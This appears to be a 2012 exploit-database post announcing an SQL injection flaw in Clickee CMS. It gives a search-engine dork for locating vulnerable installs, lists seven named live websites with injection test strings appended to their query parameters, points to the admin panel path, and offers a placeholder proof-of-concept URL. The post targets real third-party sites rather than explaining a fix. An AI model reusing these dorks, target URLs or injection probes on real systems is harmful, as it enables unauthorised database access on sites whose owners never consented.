Clickee CMS SQL Injection Vulnerability



EKU-ID: 1960 CVE: OSVDB-ID:
Author: xDarkSton3x Published: 2012-04-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##################################################
# Exploit Title: Clickee CMS Vuln [ Sqli ]
# Vendor: http://www.clickee.com/
# Date: 18/04/2012
# Author: xDarkSton3x
#Dork: intext:Design by Estilo y Diseño - www.estilod.com   -   intext:Design by Estilo y Diseño - www.clickee.com
# E-mail : xdarkston3x@msn.com
# Category: webapps
# Example Sites :
http://www.comutv.org/php/sitioslistar.php?ciudad=1'
http://www.clickee.com/php/productosver.php?ciudad=1&idproducto=17'
http://www.encuentrodecreativos.com/php/sitioslistar.php?ciudad=1&id_inicio=10'
http://www.inversionesmeybar.com/php/sitioslistar.php?ciudad=1&id_inicio='
http://www.acom-online.org/php/sitioslistar.php?ciudad=1'
http://www.estilod.com/php/tipsver.php?servicio=120&ciudad=1'
http://www.alejandromonsalve.com/php/sitioslistar.php?ciudad=1'

Admin Panel: admin/admin.php

##################################################

[~]Exploit/p0c :
http://www.site.com/php/x.php?var=[sqli]

Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng]